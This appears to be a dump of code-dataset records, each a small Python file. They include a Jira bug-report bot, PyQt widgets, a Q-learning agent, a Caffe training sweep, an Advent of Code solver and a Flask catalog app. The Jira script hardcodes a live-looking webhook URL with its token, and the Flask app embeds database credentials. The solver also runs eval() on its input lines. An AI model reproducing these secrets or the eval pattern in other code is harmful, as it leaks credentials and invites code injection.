webhook URL (create the group first, then add the bot, then fetch the bot's webhook URL)\nfeishu_url_cxxl = 'https://open.feishu.cn/open-apis/bot/v2/hook/2c593c2f-bf67-4e92-bd64-443feb024ea4'\n\n\ndef jql_deal(forward_day, today_day, product, teams):\n    jql_create_bugs = 'project = BUG AND ( ' + product + ' AND created >= ' + str(forward_day) + \\\n                      ' AND created <= ' + str(today_day) + ' ORDER BY created DESC'\n    jql_repair_bugs = 'project = BUG AND ' + teams + ' AND created >= ' + str(forward_day) + \\\n                      ' AND created <= ' + str(today_day) + ' ORDER BY cf[10468] DESC, resolved DESC, cf[10441] ASC, created DESC'\n    print(jql_create_bugs)\n    print(jql_repair_bugs)\n    return jql_create_bugs, jql_repair_bugs\n\n\ndef create_bugs(f_day, l_day, product, team):\n    all_bugs = jira.search_issues(jql_deal(f_day, l_day, product, team)[0],\n                                  fields='', maxResults=1000)  # fetch all bugs\n    print(all_bugs)\n    # return all_bugs\n    text = ''\n    criti_bugs = ''\n    L0 = 0\n    L1 = 0\n    L2 = 0\n    L3 = 0\n    result_support_list = {}\n    result_onlingbug_list = {}\n    for issue in all_bugs:\n        assignee = str(issue.fields.assignee)  # assignee\n        result_support = str(issue.fields.customfield_10442)\n        print(result_support)# triage result - technical support\n        if result_support:\n            if result_support_list.get(result_support):\n                result_support_list[result_support] += 1\n            else:\n                result_support_list[result_support] = 1\n        result_onlingbug = str(issue.fields.customfield_10441)  # triage result - production defect\n        if len(assignee) == 2:  # formatting tweak\n            assignee = assignee[0] + \" \" + assignee[1]\n\n        # print(assignee)\n        # reporter = str(issue.fields.reporter)\n        # if len(reporter) == 2:\n        #     reporter = reporter[0] + \" \" + reporter[1]\n        level = str(issue.fields.customfield_10440)  # bug severity\n        if level == 'None':\n            level = \"L2\"\n        status = str(issue.fields.status)  # status\n        summary = issue.fields.summary  # bug title\n        if len(summary) > 20:\n            summary = summary[:24] + \"...\"\n        bug = str(issue) + \" \" + level + \"-\" + str(assignee) + \"-\" + status + \"-\" + 
summary\n        text += bug + \"\\n\"\n        creatime = \"创建时间:\" + str(issue.fields.created[:10])\n        text = text + creatime + \"\\n\"\n        if level == 'L0':\n            L0 += 1\n            criti_bugs += bug + \"\\n\"\n        elif level == 'L1':\n            L1 += 1\n            criti_bugs += bug + \"\\n\"\n        elif level == 'L2':\n            L2 += 1\n        elif level == 'L3':\n            L3 += 1\n        else:\n            L2 += 1\n    return str(len(all_bugs)), text, (L0, L1, L2, L3), criti_bugs, result_support_list\n\n\ndef send_to_feishu_developer(text, feishu_url):\n    \"\"\"\n    Send a Feishu message\n    :param text:\n    :param feishu_url:\n    :return:\n    \"\"\"\n    headers = {'Content-Type': 'application/json'}\n    data = {\"msg_type\": \"text\", \"content\": {\"text\": text}}\n    res = requests.post(feishu_url, json=data, headers=headers)\n    if res.status_code == 200:\n        return True\n    else:\n        return False\n\n\n\n\n\nwd = 7\nt_day1 = date.today()\n# print(t_day1)\nf_day1 = (datetime.now() - timedelta(days=wd)).strftime('%Y-%m-%d')\n# print(f_day1)\n\n\na = create_bugs(f_day=f_day1, l_day=t_day1, product=product_jd, team=team_jd)\nprint(a)\n\n\n# send_to_feishu_developer(a[1], feishu_url_cxxl)\n\n\n","sub_path":"onjira/everyweek_bug.py","file_name":"everyweek_bug.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"535920534","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom storage.models import Format\n\n# class Format(QtGui.QTextFormat):\n#     def __init__(self):\n#         super().__init__()\n#\n#     def toQColor(self, hex):\n#         r, g, b = hex[1:3], hex[3:5], hex[5:7]\n#         return QtGui.QColor(int(r, 16), int(g, 16), int(b, 16))\n\nclass FormatManager:\n    LEVEL_FORMAT_COLORS = dict()\n    LEVEL_FORMATS = dict()  # generate by LEVEL_FORMAT_COLORS\n\n    # default values\n    LEVEL_FORMAT_COLORS = {\n        1: '#87a840',\n        2: '#ddc328',\n        3: '#b63226',\n        4: '#278da9',\n        # 5: '#363d5c',\n        None: '#363d5c'\n    }\n\n    for format in Format.objects.all():\n        if format.level == 0: \n            LEVEL_FORMAT_COLORS[None] = format.color\n        else:\n            LEVEL_FORMAT_COLORS[format.level] = format.color\n        # print('format.color', format.color)\n        # print('format.level', format.level)\n\n    POS_FORMAT_COLORS = {\n        1: '#363d5c',\n        2: '#87a840',\n        3: '#ddc328'\n    }\n    POS_FORMATS = {}\n\n    def __init__(self, editor):\n        self.editor = editor\n\n        for level, color in self.LEVEL_FORMAT_COLORS.items():\n            format = QtGui.QTextCharFormat()\n            format.setForeground(self.toQColor(color))\n            self.LEVEL_FORMATS[level] = format\n\n        for level, color in self.POS_FORMAT_COLORS.items():\n            format = QtGui.QTextCharFormat()\n            format.setForeground(self.toQColor(color))\n            self.POS_FORMATS[level] = format\n\n    def toQColor(self, hex):\n        r, g, b = hex[1:3], hex[3:5], hex[5:7]\n        return QtGui.QColor(int(r, 16), int(g, 16), int(b, 16))\n","sub_path":"managers/FormatManager.py","file_name":"FormatManager.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"453572788","text":"#%%\nimport numpy as np\nlearning_rates = 10 ** np.random.uniform(-7, -5, 10)\n#%% create solvers\nconf = []\nconf_names = []\nfor lr in learning_rates:\n    conf.append(\n'''net: \"models/model3/train_val.prototxt\"\ntest_iter: 200\ntest_interval: 500\nbase_lr: {0}\nlr_policy: \"step\"\ngamma: 0.1\nstepsize: 6000\ndisplay: 20\nmax_iter: 6000\nmomentum: 0.9\nweight_decay: 0.0005\nsnapshot: 2000\nsnapshot_prefix: \"models/model3/model3_train_{0:.9f}\"\nsolver_mode: GPU'''.format(lr))\n    conf_names.append(\"models/model3/solver_{0:.9f}.prototxt\".format(lr))\n\nfor i in 
range(len(learning_rates)):\n    with open(conf_names[i], \"w\") as text_file:\n        text_file.write(conf[i])\n\n#%%\n\ncommands = []\n\nfor lr in learning_rates:\n    commands.append(\n'''caffe train \\\\\n    -gpu 0 \\\\\n    -solver models/model3/solver_{0:.9f}.prototxt \\\\\n    -weights models/model3/bvlc_reference_caffenet.caffemodel 2>&1 | tee log/model3_{0:.9f}.log'''.format(lr))\n\n#%%\nimport os\nfor cmd in commands:\n    os.system(cmd)\n","sub_path":"scripts/train_model3_model_selection.py","file_name":"train_model3_model_selection.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"432849036","text":"# Phone number to words\r\n\r\nphone= input(\"enter phone number: \")\r\nmapping={\r\n    \"1\":\"one\",\r\n    \"2\":\"two\",\r\n    \"3\":\"three\",\r\n    \"4\":\"four\",\r\n    \"5\":\"five\",\r\n    \"6\":\"six\",\r\n    \"7\":\"seven\",\r\n    \"8\":\"eight\",\r\n    \"9\":\"nine\",\r\n    \"0\":\"zero\"\r\n}\r\n\r\noutput=\"\"\r\nfor i in phone:\r\n    output += mapping.get(i,\"!\") + \" \" # prints an exclamation mark for any character that is not a digit\r\nprint(output)\r\n","sub_path":"python_prac/Number to words.py","file_name":"Number to words.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"159744919","text":"import sys\n\nfrom helpers import main_menu, set_donor_name\nfrom db_ops import update_donations, list_donors, add_donor, create_report, send_thankyou, save_report\n\n\ndef thankyou_procedure():\n    donor_name = set_donor_name()\n    if donor_name.lower() == 'list':\n        print(list_donors())\n    elif donor_name in list_donors():\n        send_thankyou(donor_name)\n    else:\n        add_donor(donor_name)\n\n\ndef main():\n    while True:\n        users_choice = main_menu()\n        selection = {\n            '1': thankyou_procedure,\n            '2': create_report,\n            '3': save_report,\n            '4': sys.exit\n        }\n        try:\n            selection[users_choice]()\n        except KeyError:\n            print('Choose 1 to 4')\n            pass\n","sub_path":"students/ghassan/lesson07/mailroom/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"478169132","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n\nclass Gui(QWidget):\n    def __init__(self):\n        super().__init__()\n        self.initUi()\n\n    def initUi(self):\n        valueBeforeLabel = QLabel('Value before')\n        valueAfterLabel = QLabel('Value after')\n        fromCurrencyLabel = QLabel('From currency')\n        toCurrencyLabel = QLabel('To currency')\n        self.valueBefore = QLineEdit()\n        self.valueAfter = QLineEdit()\n        self.fromCurrency = QComboBox()\n        self.toCurrency = QComboBox()\n        self.convertButton = QPushButton('Convert')\n\n        # Validator\n        self.valueBefore.setValidator(QIntValidator())\n        self.valueAfter.setValidator(QIntValidator())\n        self.valueAfter.setReadOnly(True)\n\n        # Layout\n        grid = QGridLayout()\n        grid.setSpacing(10)\n        grid.addWidget(valueBeforeLabel, 1, 0)\n        grid.addWidget(self.valueBefore, 1, 1)\n        grid.addWidget(fromCurrencyLabel, 2, 0)\n        grid.addWidget(self.fromCurrency, 2, 1)\n        grid.addWidget(toCurrencyLabel, 3, 0)\n        grid.addWidget(self.toCurrency, 3, 1)\n        grid.addWidget(valueAfterLabel, 4, 0)\n        grid.addWidget(self.valueAfter, 4, 1)\n        grid.addWidget(self.convertButton, 5, 1)\n        self.setLayout(grid)\n\n        # Set up\n        width, height = (400, 300)\n        self.setWindowTitle(\"Currency converter\")\n        self.resize(width, height)\n\n        # Center\n        qtRectangle = self.frameGeometry()\n        centerPoint = 
QDesktopWidget().availableGeometry().center()\n qtRectangle.moveCenter(centerPoint)\n self.move(qtRectangle.topLeft())","sub_path":"Gui.py","file_name":"Gui.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"471908450","text":"from config import Config as cfg\nfrom utils import *\n\nimport tensorflow as tf\nimport gym\nimport numpy as np\n\nenv = gym.make('MountainCar-v0')\npos_bins = 30\nspeed_bins = 30\nobs_dim = pos_bins+speed_bins\nn_acts = env.action_space.n\n\nQ1 = mlp(obs_dim, [200, n_acts], dropout=None, use_bias=False)\nQ2 = mlp(obs_dim, [200, n_acts], dropout=None, use_bias=False)\n\nQ1_opt = tf.optimizers.Adam(learning_rate=cfg.learning_rate)\nQ2_opt = tf.optimizers.Adam(learning_rate=cfg.learning_rate)\n\n# acts = [0,1,1,2,...]\n# logits = [[l1, l2, l3], [l1, l2, l3] ...]\n# acts*logits = [[l1, 0, 0], [0,l2,0], ...] ==> reduce_sum() ==> [l1, l2, ...]\n\ndef train_step(Q1, Q1_opt, Q2, Q2_opt, epsilon):\n '''\n :param Q1: First function approximator for the action value function\n :param Q1_opt: Optimizer for the first function approximator\n :param Q2: Second function approximator for the action value function\n :param Q2_opt: Optimizer for the second function approximator\n :param epsilon: Agent will explore with probability epsilon\n :return: dictionary of summary statistics of the train step\n '''\n\n # Initialization for batch. Batch contains multiple episodes:\n collect_Q1_loss = 0 # loss for Q1 and Q2\n collect_Q2_loss = 0 #\n iteration = 0\n batch_acts = [] # store actions\n batch_rews = [] # store rewards\n batch_obs = [] # store observations\n batch_rets = [] # store episode returns\n batch_lens = [] # store episode lengths\n batch_velocity = [] # store the absolute speed over the train step\n\n # reset episode-specific variables\n obs = env.reset() # first obs comes from starting distribution\n done = False # signal from environment that episode is over\n ep_rews = [] # list for rewards accrued throughout ep\n ep_obs = []\n ep_acts = []\n ep_velocity = []\n\n # generate an episode\n while not done:\n pos_input = discretize(obs[0], np.linspace(env.observation_space.low[0], env.observation_space.high[0] - 0.1,\n pos_bins))\n speed_input = discretize(obs[1], np.linspace(env.observation_space.low[1], env.observation_space.high[1],\n speed_bins))\n input = np.concatenate([pos_input, speed_input])\n ep_obs.append(input.copy())\n\n if np.random.binomial(1, 1 - epsilon):\n # value_input = np.concatenate([np.array([obs] * 3), tf.one_hot([0, 1, 2], 3)], axis=1)\n act = np.argmax(tf.nn.softmax(Q1(input.reshape(1,-1))) + tf.nn.softmax(Q2(input.reshape(1,-1))))\n #act = tf.random.categorical(tf.math.softmax(Q1(obs.reshape(1, -1)) + Q2(obs.reshape(1, -1))), 1).numpy()[0][\n # 0]\n else:\n act = env.action_space.sample()\n\n obs, rew, done, _ = env.step(act)\n\n ep_acts.append(act)\n ep_rews.append(rew)\n ep_velocity.append(np.abs(obs[1]))\n\n if done:\n if obs[0] >= 0.5: print('Final location: {}'.format(obs[0]))\n\n # if episode is over, record info about episode\n ep_ret, ep_len = sum(ep_rews), len(ep_rews)\n batch_rets.append(ep_ret)\n batch_lens.append(ep_len)\n batch_rews.append(ep_rews)\n batch_obs.append(ep_obs)\n batch_acts.append(ep_acts)\n batch_velocity.append(np.mean(ep_velocity))\n iteration += len(ep_obs)\n\n # reset episode-specific variables\n obs, done, = env.reset(), False\n ep_rews, ep_obs, ep_acts, ep_velocity = [], [], [], []\n\n # end experience loop if we have 
enough of it\n if iteration > cfg.batch_size:\n # print(len(batch_obs))\n break\n\n with tf.GradientTape(persistent = True) as tape:\n for k, ep_obs, ep_rews, ep_acts in zip(range(len(batch_obs)), batch_obs, batch_rews, batch_acts):\n # phi_input = np.concatenate([np.array(ep_obs), tf.one_hot(ep_acts, 3)], axis = 1)\n ep_len = len(ep_obs)\n phi_1 = Q1(np.array(ep_obs), training=True)\n phi_2 = Q2(np.array(ep_obs), training=True)\n\n which_network = np.random.binomial(1, 0.5) # switch which network we are updating\n\n if which_network:\n # targets can be static...\n # the discounted return\n G = n_step_G(ep_rews, cfg.td_steps, cfg.discount_rate)\n # if we have not reached the top by end of episode, append action value estimate, otherwise append 0\n extra = phi_2[-1][np.argmax(phi_1[-1])] if (obs[0] < 0.5) else 0\n\n # if we are not done, then Q is the n-step-ahead action value function output ...\n # ... otherwise it is the value of 'extra'\n Q_ = [phi_2[j + cfg.td_steps][np.argmax(phi_1[j + cfg.td_steps])] if j + cfg.td_steps < ep_len\n else 0\n for j in range(ep_len)]\n Q = [cfg.discount_rate ** cfg.td_steps * q if j + cfg.td_steps < ep_len\n else cfg.discount_rate ** (ep_len - j) * extra\n for j, q in enumerate(Q_)]\n\n # form the full targets\n td_targets = np.array(G) + np.array(Q)\n\n # values must be linked (allow backprop), are they?\n # td_values = tf.reduce_sum(phi_2*tf.one_hot(ep_acts, 3),axis=1)[:-1]\n td_values = [phi_1[j][ep_acts[j]] for j in range(ep_len)]\n value_func_loss = tf.losses.MeanSquaredError()(td_targets, td_values)\n collect_Q1_loss += value_func_loss\n else:\n G = n_step_G(ep_rews, cfg.td_steps, cfg.discount_rate)\n extra = phi_1[-1][np.argmax(phi_2[-1])] if (obs[0] < 0.5) else 0\n\n Q_ = [phi_1[j + cfg.td_steps][np.argmax(phi_2[j + cfg.td_steps])] if j + cfg.td_steps < ep_len\n else 0\n for j in range(ep_len)]\n Q = [cfg.discount_rate ** cfg.td_steps * q if j + cfg.td_steps < ep_len\n else cfg.discount_rate ** (ep_len - j) * extra\n for j, q in enumerate(Q_)]\n\n td_targets = np.array(G) + np.array(Q)\n\n td_values = [phi_2[j][ep_acts[j]] for j in range(ep_len)]\n value_func_loss = tf.losses.MeanSquaredError()(td_targets, td_values)\n collect_Q2_loss += value_func_loss\n\n Q1_grads = tape.gradient(collect_Q1_loss, Q1.trainable_variables)\n Q1_opt.apply_gradients(zip(Q1_grads, Q1.trainable_variables))\n\n Q2_grads = tape.gradient(collect_Q2_loss, Q2.trainable_variables)\n Q2_opt.apply_gradients(zip(Q2_grads, Q2.trainable_variables))\n\n return({'Q1_loss': collect_Q1_loss,\n 'Q2_loss': collect_Q2_loss,\n 'batch_acts':batch_acts,\n 'batch_rets':batch_rets,\n 'batch_lens':batch_lens,\n 'average_velocity':np.mean(batch_velocity)\n })\n\n\nfor i in range(cfg.epochs):\n res = train_step(Q1, Q1_opt, Q2, Q2_opt, epsilon=max(cfg.explore_0*cfg.explore_decay**i, 0.1))\n print('Epoch {}: Q1 loss: {}, Q2 loss: {}, Avg Reward: {}, Avg ep len: {}, Avg speed: {}'.format(\n i, res['Q1_loss'], res['Q2_loss'], np.sum(res['batch_rets'])/len(res['batch_rets']),\n np.sum(res['batch_lens']) / len(res['batch_lens']), res['average_velocity']))\n#\n\n### inspect the performance of the agent:\nimport time\nobs = env.reset() # first obs comes from starting distribution\ndone = False # signal from environment that episode is over\n\nfor i in range(10):\n while not done:\n pos_input = discretize(obs[0], np.linspace(env.observation_space.low[0], env.observation_space.high[0] - 0.1,\n pos_bins))\n speed_input = discretize(obs[1], np.linspace(env.observation_space.low[1], 
env.observation_space.high[1],\n                                                    speed_bins))\n        input = np.concatenate([pos_input, speed_input])\n        # value_input = np.concatenate([np.array([obs] * 3), tf.one_hot([0, 1, 2], 3)], axis=1)\n        act = np.argmax(Q1(input.reshape(1,-1))+Q2(input.reshape(1,-1)))\n        # act = tf.random.categorical(tf.math.softmax(Q1(obs.reshape(1, -1)) + Q2(obs.reshape(1, -1))), 1).numpy()[0][0]\n        obs, rew, done, _ = env.step(act)\n        env.render()\n        time.sleep(0.01)\n\n    done = False\n    obs = env.reset()\n\nenv.close()","sub_path":"q_learning/double_q_td_mountaincar.py","file_name":"double_q_td_mountaincar.py","file_ext":"py","file_size_in_byte":8467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"488262476","text":"# -*- coding: utf-8 -*-\r\n# case 1284\r\nimport os\r\nimport unittest\r\nimport common.util as u\r\nfrom uiautomatorplug.android import device as d\r\nimport time\r\n\r\n\"\"\"\r\nissues:\r\n1. adb always offline\r\n\"\"\"\r\nclass fm_open_close(unittest.TestCase):\r\n    def setUp(self):\r\n        u.clog()\r\n        u.checkScreen()\r\n        d.click(1380, 800)\r\n        u.setUp()\r\n\r\n    def tearDown(self):\r\n        u.tearDown()\r\n\r\n    # @unittest.skip(\"skip this test\")\r\n    def test_open_close(self):\r\n        for i in xrange(100):\r\n            self._launch_apps()\r\n            time.sleep(2)\r\n            d(resourceId=\"android:id/mwCloseBtn\").click()\r\n            time.sleep(2)\r\n\r\n\r\n    def _launch_apps(self):\r\n        cmp = \"com.chaozhuo.filemanager/.activities.MainActivity\"\r\n        d.start_activity(component=cmp)\r\n","sub_path":"atPhoenix/autoTest/script/testcases/tmp/fm_open_close.py","file_name":"fm_open_close.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"288103923","text":"#advent of code 18\n# Operator-remapping trick: main() rewrites '*' as '-' (and '+' as '/' for part 2),\n# so __sub__ actually multiplies and __truediv__ actually adds, flipping precedence.\n\nclass Number:\n    def __init__ (self,value):\n        self.value = value\n\n    def __add__ (self,other):\n        return Number(self.value + other.value)\n\n    def __sub__ (self,other):  # '-' stands in for '*'\n        return Number(self.value * other.value)\n\n    def __truediv__(self,other):  # '/' stands in for '+'\n        return Number(self.value + other.value)\n\n\ndef main():\n    part1 = False\n    \n    myfile = open('input18.txt')\n    data = myfile.read()\n    myfile.close()\n\n    data = data.split('\\n')\n    total = 0\n    for i in range (len(data)):\n        line = data[i].replace(\" \", \"\").replace('*','-')\n        if not part1:\n            line = line.replace('+','/')\n        line = list(line)\n        \n        \n        \n        for i in range (len(line)):\n            if line[i] not in ['+','-','/','(',')',' ']:\n                line[i] = 'Number('+line[i]+')'\n\n        \n        line = ''.join(line)\n        total += eval(line).value\n        \n    if part1:\n        print('Part 1:',total)\n    else:\n        print('Part 2:',total)\n    \n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"adventCode18.py","file_name":"adventCode18.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"481124910","text":"import re\n\n# \"log/cups/access_log\" -> \"log/cups/\"\ndef get_path_part(filename):\n    try:\n        index = filename.rindex('/')\n        dir_name = filename[0: index + 1]\n        return dir_name\n    except:\n        return ''\n\n# \"log/cups/access_log\" -> \"access_log\"\ndef get_filename_part(filename):\n    try:\n        index = filename.rindex('/')\n        base_name = filename[index + 1:]\n        return base_name\n    except:\n        return filename\n\n\n\n# \"assets/image.png\" -> \"png\"\ndef get_file_extension(filename):\n    try:\n        occurrences = [m.start() for m in re.finditer('\\.', filename)]\n        return filename[occurrences[-1] + 1:]\n    except:\n        return 
''\n\n\n\nassert(get_path_part(\"log/cups/access_log\") == \"log/cups/\")\nassert(get_path_part(\"log/cups/\") == \"log/cups/\")\nassert(get_path_part(\"cups/access_log\") == \"cups/\")\nassert(get_path_part(\"access_log\") == \"\")\nassert(get_filename_part(\"log/cups/access_log\") == \"access_log\")\nassert(get_filename_part(\"log/cups/\") == \"\")\nassert(get_filename_part(\"cups/access_log\") == \"access_log\")\nassert(get_filename_part(\"access_log\") == \"access_log\")\nassert(get_file_extension(\"log/cups/access_log\") == \"\")\nassert(get_file_extension(\"base/FileHelper.cpp\") == \"cpp\")\nassert(get_file_extension(\"base/FileHelper.cpp.bak\") == \"bak\")","sub_path":"FilePath.py","file_name":"FilePath.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"193271093","text":"# This file is part of VoltDB.\n\n# Copyright (C) 2008-2015 VoltDB Inc.\n#\n# This file contains original code and/or modifications of original code.\n# Any modifications made by VoltDB Inc. are licensed under the following\n# terms and conditions:\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n\n# Main Java class.\nVoltCompiler = 'org.voltdb.compiler.VoltCompiler'\n\n\n# Command meta-data.\n@VOLT.Command(\n # Descriptions for help screen.\n description='Compile schema and stored procedures to build an application catalog.',\n description2='At least one DDL file is required unless a project file is provided.',\n\n # Command line options.\n options=(\n VOLT.StringOption('-c', '--classpath', 'classpath',\n 'additional colon-separated Java CLASSPATH directories'),\n VOLT.StringOption('-o', '--output', 'catalog',\n 'the output application catalog jar file',\n default='catalog.jar'),\n VOLT.StringOption('-p', '--project', 'project',\n 'the project file, e.g. project.xml (deprecated)')\n ),\n\n # Command line arguments.\n arguments=(\n VOLT.PathArgument('ddl', 'DDL file(s)', exists=True, min_count=0, max_count=None)\n )\n)\n# Command implementation.\ndef compile(runner):\n # Check that there's something to compile.\n if not runner.opts.project and not runner.opts.ddl:\n runner.abort_with_help('Either project or DDL files must be specified.')\n\n # Explicit extensions allow VoltCompiler.main() to discriminate between the\n # new and old style argument lists, i.e. 
with and without a project file.\n    # Checking here enables better error messages.\n    if not runner.opts.catalog.lower().endswith('.jar'):\n        runner.abort('Output catalog file \"%s\" does not have a \".jar\" extension.'\n                            % runner.opts.catalog)\n    if runner.opts.project and not runner.opts.project.lower().endswith('.xml'):\n        runner.abort('Project file \"%s\" does not have a \".xml\" extension.'\n                            % runner.opts.project)\n\n    # Verbose argument display.\n    if runner.is_verbose():\n        params = ['Output catalog file: %s' % runner.opts.catalog]\n        if runner.opts.project:\n            params.append('Project file: %s' % runner.opts.project)\n        if runner.opts.ddl:\n            params.append('DDL files:')\n            params.append(runner.opts.ddl)\n        runner.verbose_info('Compilation parameters:', params)\n\n    # Build the positional and keyword argument lists and invoke the compiler\n    args = []\n    if runner.opts.project:\n        args.append(runner.opts.project)\n    args.append(runner.opts.catalog)\n    if runner.opts.ddl:\n        args.extend(runner.opts.ddl)\n    # Add procedures to classpath\n    cpath = 'procedures'\n    if runner.opts.classpath:\n        cpath = 'procedures:' + runner.opts.classpath\n    kwargs = dict(classpath=cpath)\n    runner.java_execute(VoltCompiler, None, *args, **kwargs)\n","sub_path":"Java+/Database+/VoltDb+/VoltDbEmbedded/libs/python/voltcli/voltdb.d/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"392848775","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask import flash, make_response, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_configuration import Base, Category, Item, User\nfrom flask import session as login_session\nimport random\nimport string\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nimport requests\n\nCLIENT_ID = json.loads(\n    open('client_secrets.json', 'r').read())['web']['client_id']\n\napp = Flask(__name__)\nengine = create_engine('postgresql://sysdba:secret@localhost/catalog')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n# Check if it's a logged-in user or just an anonymous user.\ndef CheckUserLogin():\n    return 'username' in login_session\n\n\n# Check if the user who attempts to edit/delete the item is authorized.\ndef CheckItemOwner(item):\n    if(CheckUserLogin()):\n        currentLoggedUser_id = getUserID(login_session['email'])\n        itemOwner = item.user.id\n        return currentLoggedUser_id == itemOwner\n    else:\n        return False\n\n\n# User Helper Functions:\ndef createUser(login_session):\n    newUser = User(name=login_session['username'], email=login_session[\n        'email'])\n    session.add(newUser)\n    session.commit()\n    user = session.query(User).filter_by(email=login_session['email']).one()\n    return user.id\n\n\ndef getUserInfo(user_id):\n    user = session.query(User).filter_by(id=user_id).one()\n    return user\n\n\ndef getUserID(email):\n    try:\n        user = session.query(User).filter_by(email=email).one()\n        return user.id\n    except Exception as e:\n        return None\n\n\n@app.route('/', methods=['GET'])\ndef index():\n    categories = session.query(Category).all()\n    items = session.query(Item).order_by(Item.id.desc()).limit(9)\n    LOGIN = CheckUserLogin()\n    return render_template(\n        'index.html', categories=categories, items=items, login=LOGIN)\n\n\n@app.route('/catalog/<int:category_id>/items', methods=['GET'])\ndef 
categoryItems(category_id):\n    categories = session.query(Category).all()\n    items = session.query(Item).filter_by(category_id=category_id).all()\n    LOGIN = CheckUserLogin()\n    return render_template(\n        'items.html', categories=categories, items=items, login=LOGIN)\n\n\n@app.route('/catalog/<int:category_id>/<int:item_id>', methods=['GET'])\ndef itemInfo(category_id, item_id):\n    item = session.query(Item).filter_by(id=item_id).one()\n    owner = CheckItemOwner(item)\n    return render_template('item.html', item=item, owner=owner)\n\n\n@app.route('/catalog/new', methods=['GET', 'POST'])\ndef newItem():\n    if not CheckUserLogin():\n        return redirect(url_for(\"showLogin\"))\n\n    categories = session.query(Category).all()\n    if request.method == 'POST':\n        category_id = request.form.get('category_id')\n        user_id = getUserID(login_session['email'])\n        item = Item(name=request.form.get(\n            'name'), description=request.form.get(\n            'description'), category_id=category_id, user_id=user_id)\n        session.add(item)\n        session.commit()\n        return redirect(url_for(\"categoryItems\", category_id=category_id))\n    else:\n        return render_template('new.html', categories=categories)\n\n\n@app.route('/catalog/<int:category_id>/<int:item_id>/edit', methods=[\n    'GET', 'POST'])\ndef editItem(category_id, item_id):\n    categories = session.query(Category).all()\n    item = session.query(Item).filter_by(id=item_id).one()\n    owner = CheckItemOwner(item)\n    if not owner:\n        code = 403\n        message = \"You are not Authorized to do this.\"\n        return render_template(\"error.html\", code=code, message=message)\n\n    if request.method == 'POST':\n        item.name = request.form.get('name')\n        item.description = request.form.get('description')\n        item.category_id = request.form.get('category_id')\n        session.commit()\n        return redirect(url_for(\n            \"categoryItems\", category_id=request.form.get('category_id')))\n    else:\n        return render_template(\"edit.html\", item=item, categories=categories)\n\n\n@app.route(\n    '/catalog/<int:category_id>/<int:item_id>/delete', methods=[\n        'GET', 'POST'])\ndef deleteItem(category_id, item_id):\n    item = session.query(Item).filter_by(id=item_id).one()\n    owner = CheckItemOwner(item)\n    if not owner:\n        code = 403\n        message = \"You are not Authorized to do this.\"\n        return render_template(\"error.html\", code=code, message=message)\n\n    if request.method == 'POST':\n        session.delete(item)\n        session.commit()\n        return redirect(url_for(\"categoryItems\", category_id=category_id))\n    else:\n        return render_template(\"delete.html\", item=item)\n\n\n@app.route('/api')\ndef developers():\n    return render_template(\"developers.html\")\n\n# End Points\n\n\n@app.route('/catalog/json')\ndef categoriesJSON():\n    categories = session.query(Category).all()\n    return jsonify(Categories=[i.serialize for i in categories])\n\n\n@app.route('/catalog/<int:category_id>/json')\ndef categoryJSON(category_id):\n    categoryItems = session.query(Item).filter_by(\n        category_id=category_id).all()\n    return jsonify(Items=[i.serialize for i in categoryItems])\n\n\n# Create anti-forgery state token\n@app.route('/login')\ndef showLogin():\n    state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n                    for x in range(32))\n    login_session['state'] = state\n    return render_template('login.html', STATE=state)\n\n\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n    # Validate state token\n    if request.args.get('state') != login_session['state']:\n        response = make_response(json.dumps('Invalid state parameter.'), 401)\n        